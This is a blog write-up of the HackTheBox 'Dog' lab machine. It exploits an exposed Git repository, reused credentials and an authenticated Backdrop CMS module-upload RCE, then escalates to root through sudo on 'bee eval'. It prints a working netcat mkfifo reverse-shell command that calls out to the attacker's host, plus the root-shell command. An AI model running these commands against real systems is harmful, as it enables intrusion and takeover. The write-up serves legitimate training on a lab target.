Dog Writeup (HackTheBox Easy Machine)

-



Overview

Dog is an easy Linux machine from HackTheBox. This box is a great introduction for beginners to several common and key vulnerabilities in the world of ethical hacking.

We start out discovering exposed Git repository on the website with all the source code for it. We find some information about the software which is being used, potential username and a pair of credentials for database.

With a technique called “credential stuffing”, we log in with a user we found earlier and get access to a Backdrop CMS dashboard. We search up and find authenticated RCE exploit abusing the installation of custom modules. That is how we get the initial foothold on the machine.

After that, we login as another user using the same password we used earlier and discover we can run Backdrop’s binary “bee” with elevated privileges. We abuse built-in function “eval” to run arbitrary code as super-user and get a shell as root.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.11.58 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-11 13:09 EDT
Nmap scan report for dog.htb (10.10.11.58)
Host is up (0.047s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   35.11 ms 10.10.14.1
2   36.36 ms dog.htb (10.10.11.58)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.12 seconds

The Nmap scan shows 2 ports are opened. Port 22 for SSH and port 80 for HTTP web server running on Apache 2.4.41. The scan immediately detected Backdrop CMS (Content Management System) being in use, “robots.txt” file with couple disallowed entries and exposed Git repository. Already several potential attack vectors. Don’t forget to add “dog.htb” to your “/etc/hosts”.


Web enumeration

We check the website on port 80. It’s a website about dogs, their care and problems.

Browser plugin “Wappalyzer” also confirms the presence of Backdrop CMS and PHP.


I used FFuF to fuzz for subdomains, but with no luck. Then I used Gobuster to enumerate all the directories on the website.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://dog.htb" -w /usr/share/wordlists/dirb/common.txt -t 64       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://dog.htb
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 272]
/.hta                 (Status: 403) [Size: 272]
/.git/HEAD            (Status: 200) [Size: 23]
/.htpasswd            (Status: 403) [Size: 272]
/core                 (Status: 301) [Size: 301] [--> http://dog.htb/core/]
/files                (Status: 301) [Size: 302] [--> http://dog.htb/files/]
/index.php            (Status: 200) [Size: 13260]
/layouts              (Status: 301) [Size: 304] [--> http://dog.htb/layouts/]
/modules              (Status: 301) [Size: 304] [--> http://dog.htb/modules/]
/robots.txt           (Status: 200) [Size: 1198]
/server-status        (Status: 403) [Size: 272]
/sites                (Status: 301) [Size: 302] [--> http://dog.htb/sites/]
/themes               (Status: 301) [Size: 303] [--> http://dog.htb/themes/]

Directory brute-forcing revealed bunch of exposed files and data. “Robots.txt” contained several disallowed entries, but nothing really interesting.

“Robots.txt” is a text file used by websites to communicate with web crawlers and robots about which parts of the site should not be accessed or indexed. (Blackbox.ai)


Git repository

I was particularly interested in “.git” directory, which indicated there’s exposed Git repository, which can contain source code and other valuable information. I used python tool “GitHack” to dump all the files from the repository. Those were the same directories as we saw in Gobuster.

┌──(kali㉿kali)-[~]
└─$ python3 /opt/GitHack/GitHack.py -u "http://dog.htb/.git/"
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
------------------------------
        LOT OF FILES
------------------------------

After looking at the files, we can uncover several helpful information.


In file “dog.htb/core/modules/config/config.info” we can find the version of Backdrop CMS being used 1.27.1. This information can be found in any module. I just checked “config” first.

In another file “dog.htb/settings.php” we can find credentials for internal MySQL database.

And lastly, in file “files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json” there was an email address exposed “tiffany@dog.htb”, giving us potential username “tiffany”.


Logging into website as user “tiffany”

Honourable mention: There was a suspicious parameter “q” in the URL as I moved through directories, containing the exact directory I was visiting. But soon I realized there was no need to play with it.

There was a login page and I tried some basic stuff like appending ‘ to check for SQL injection and testing if username enumeration was possible based on errors I was given (it was possible, valid username like “tiffany” got different error). But when I tried to log in as “tiffany” with the password I found for internal MySQL database, I got in. This is perfect example of credential stuffing.


Getting foothold via RCE exploit

Last thing to take into consideration was exposed version of Backdrop CMS. When I searched up the version 1.27.1, I quickly found authenticated Remote Code Execution exploit on exploit-db.

The exploit involves creating a malicious module within Backdrop CMS. By crafting a module that includes a “.info” file and a PHP script (”shell.php”), an attacker can upload this module to the CMS. Once uploaded and activated, the “shell.php” script can be accessed to execute system commands provided by the attacker. (ChatGPT)


I ran the Python exploit and it generated “shell.zip”. I had to change the suffix “.zip” to “.tar.gz” for example because the module installer doesn’t accept zip archives.

┌──(kali㉿kali)-[~]
└─$ python3 exploit.py "dog.htb"
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: dog.htb/modules/shell/shell.php


I was looking for my “shell” module in the module list but didn’t find it. After a while, I found it in “dog.htb/modules” directory.

You have to run “shell.php” with “cmd” parameter containing your command immediately, because the box is programmed to delete these files after first execution. Also remember to use shell for the wrong version of netcat with “mkfifo” otherwise the shell will not function properly.

For example: “http://dog.htb/modules/shell/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.250 1234 >/tmp/f”.

After that we get a shell as user “www-data”. Don’t forget to stabilize you shell with Python3 Pty.


Accessing MySQL database

I tried to look into home directory to see which users we have. There were 2 users “jobert” and “johncusack”, who also had the user flag but we can’t read it.

www-data@dog:/home$ ls
jobert  johncusack
www-data@dog:/home$ ls -la jobert
ls -la jobert
total 28
drwxr-xr-x 4 jobert jobert 4096 Feb  7 15:59 .
drwxr-xr-x 4 root   root   4096 Aug 15  2024 ..
lrwxrwxrwx 1 root   root      9 Feb  7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 jobert jobert  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 jobert jobert 3771 Feb 25  2020 .bashrc
drwx------ 2 jobert jobert 4096 Jul  8  2024 .cache
lrwxrwxrwx 1 root   root      9 Feb  7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 jobert jobert  807 Feb 25  2020 .profile
drwx------ 2 jobert jobert 4096 Jul  8  2024 .ssh
-rw-r--r-- 1 jobert jobert    0 Jul  8  2024 .sudo_as_admin_successful
www-data@dog:/home$ ls -la johncusack
ls -la johncusack
total 28
drwxr-xr-x 3 johncusack johncusack 4096 Feb  7 15:59 .
drwxr-xr-x 4 root       root       4096 Aug 15  2024 ..
lrwxrwxrwx 1 root       root          9 Feb  7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack  220 Aug 15  2024 .bash_logout
-rw-r--r-- 1 johncusack johncusack 3771 Aug 15  2024 .bashrc
drwx------ 2 johncusack johncusack 4096 Aug 16  2024 .cache
lrwxrwxrwx 1 root       root          9 Feb  7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack  807 Aug 15  2024 .profile
-rw-r----- 1 root       johncusack   33 Mar 13 13:13 user.txt


I remembered we already discovered credentials for internal MySQL database, to which we now have access. There was a database with unusual name called “backdrop”. I found table called “users” and dumped the information. There was a hashed password for user “jobert”.

www-data@dog:/home$ which mysql
/usr/bin/mysql
www-data@dog:/home$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5981
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| backdrop           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)
dumped password hashes for all the users

After trying to crack the hash with Hashcat, I was NOT able to crack it. So I started to look elsewhere but that was not neccesary.


Logging in as “johncusack” & user flag

After this failure, I tried to re-use tiffany’s password once again for our 2 users. And to my delight, I logged in as “johncusack”. Sometimes it’s just best not to overthink things, mainly when you are dealing with easy machines. Nothing was stopping me from printing out the user flag.

www-data@dog:/home$ su jobert
Password: 
su: Authentication failure
www-data@dog:/home$ su johncusack 
Password: 
johncusack@dog:/home$ whoami
johncusack
johncusack@dog:/home$ pwd
/home
johncusack@dog:/home$ cd johncusack/
johncusack@dog:~$ ls -la
total 32
drwxr-xr-x 4 johncusack johncusack 4096 Mar 13 16:29 .
drwxr-xr-x 4 root       root       4096 Aug 15  2024 ..
lrwxrwxrwx 1 root       root          9 Feb  7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack  220 Aug 15  2024 .bash_logout
-rw-r--r-- 1 johncusack johncusack 3771 Aug 15  2024 .bashrc
drwx------ 2 johncusack johncusack 4096 Aug 16  2024 .cache
lrwxrwxrwx 1 root       root          9 Feb  7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack  807 Aug 15  2024 .profile
drwxrwxr-x 2 johncusack johncusack 4096 Mar 13 16:29 .ssh
-rw-r----- 1 root       johncusack   33 Mar 13 15:41 user.txt


Privilege Escalation via binary “bee” & root flag

As usual, we check our sudo permissions and find out that we can run some binary “bee” as sudo. This file was actually a link to another php script in unusual “/backdrop_tool/bee” directory.

johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$ ls -la /usr/local/bin/bee 
lrwxrwxrwx 1 root root 26 Jul  9  2024 /usr/local/bin/bee -> /backdrop_tool/bee/bee.php
johncusack@dog:~$ ls -la /backdrop_tool/bee/bee.php 
-rwxr-xr-x 1 root root 2905 Jul  9  2024 /backdrop_tool/bee/bee.php

Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites. (backdropcms.org)


I checked the help page of the binary and tried couple commands. I found very interesting and potentially helpful command “eval”, which executes arbitrary PHP code. However, I encountered an error very quickly after running the binary with “eval” command.

“eval” command which executes arbitrary code
johncusack@dog:/tmp$ sudo /usr/local/bin/bee eval "system('/bin/bash')"

 ✘  The required bootstrap level for 'eval' is not ready. 

johncusack@dog:/tmp$


The error stated that some bootstrap level is not ready.

The concept of bootstrapping in software development is derived from the idea of starting with a minimal or basic set of tools and gradually building up more sophisticated systems. In the context of a binary, it involves using an initial binary or tool to create or compile a new, more advanced binary. (ChatGPT)

This seemed to me like there’s some missing prerequisite. I re-read the help page and another command caught my attention, possibly solving this issue.

“--root” option which specifies the directory of Backdrop installation

The “--root” option was used to specify the directory of Backdrop installation, which turned out to be our missing prerequisite.


I specified the path “/var/www/html”. This is the root directory of the web server.

johncusack@dog:/tmp$ ls -la /var/www/html
total 108
drwxrwxr-x 9 www-data www-data  4096 Mar 14 16:55 .
drwxr-xr-x 3 root     root      4096 Jul  8  2024 ..
-rw-r--r-- 1 www-data www-data    48 Mar 14 16:53 a.sh
-rw-r--r-- 1 www-data www-data    48 Mar 14 16:53 a.sh.1
drwxrwx--- 9 www-data www-data  4096 Jul  8  2024 core
drwxrwx--- 7 www-data www-data  4096 Jul  9  2024 files
drwxr-xr-x 8 root     root      4096 Feb  7 21:22 .git
-rwxrwx--- 1 www-data www-data   578 Mar  7  2024 index.php
drwxrwx--- 2 www-data www-data  4096 Jul  8  2024 layouts
-rwxrwx--- 1 www-data www-data 18092 Mar  7  2024 LICENSE.txt
drwxrwx--- 2 www-data www-data  4096 Mar 14 17:28 modules
-rwxrwx--- 1 www-data www-data  5285 Mar  7  2024 README.md
-rwxrwx--- 1 www-data www-data  1198 Mar  7  2024 robots.txt
-rwxrwx--- 1 www-data www-data 21732 Jul  8  2024 settings.php
-rw-r--r-- 1 www-data www-data   350 Mar 14 15:53 shell.php
drwxrwx--- 2 www-data www-data  4096 Jul  8  2024 sites
drwxrwx--- 2 www-data www-data  4096 Jul  8  2024 themes

With that in place, I re-ran the “bee” binary and I got the root shell.

johncusack@dog:/tmp$ sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash')"
[sudo] password for johncusack: 
root@dog:/var/www/html# whoami
root
root@dog:/var/www/html# pwd
/var/www/html
root@dog:/var/www/html# cd /root
root@dog:~# ls -la
total 44
drwx------  5 root root 4096 Mar 14 14:37 .
drwxr-xr-x 19 root root 4096 Feb  7 18:31 ..
lrwxrwxrwx  1 root root    9 Feb  7 15:59 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Jan 29 15:49 .cache
-rw-r--r--  1 root root   94 Aug 15  2024 .gitconfig
drwxr-xr-x  3 root root 4096 Jul  9  2024 .local
lrwxrwxrwx  1 root root    9 Feb  7 15:59 .mysql_history -> /dev/null
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Mar 14 14:37 root.txt
-rw-r--r--  1 root root   66 Jul 11  2024 .selected_editor
drwx------  2 root root 4096 Jul  8  2024 .ssh
-rw-r--r--  1 root root  165 Feb  7 15:59 .wget-hsts

And finally, nothing was stopping me to claim the victory and get the root flag.


Summary

Dog is an easy machine from HackTheBox. The box plays with couple common vulnerabilities from the real world, like exposed source code and re-using same passwords. It starts with showcasing the dangers of leaving your Git repository exposed on your website with all the source code and hardcoded credentials. It also shows how legacy CMS (Content Management System) versions (Backdrop in this case) are vulnerable to unpatched bugs, allowing for critical vulnerabilities like RCE (Remote Code Execution). After getting a shell, box continues to showcase what might happen if you allow low-privileged users to use binaries as super-user, mainly if the binary allows for code execution. This machine taught me not to overthink things too much, as I got stuck couple times on fairly simple things, like trying to crack hashes from internal MySQL database. So try the basic stuff first before going for complex solutions. Overall, very instructive and fun box.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more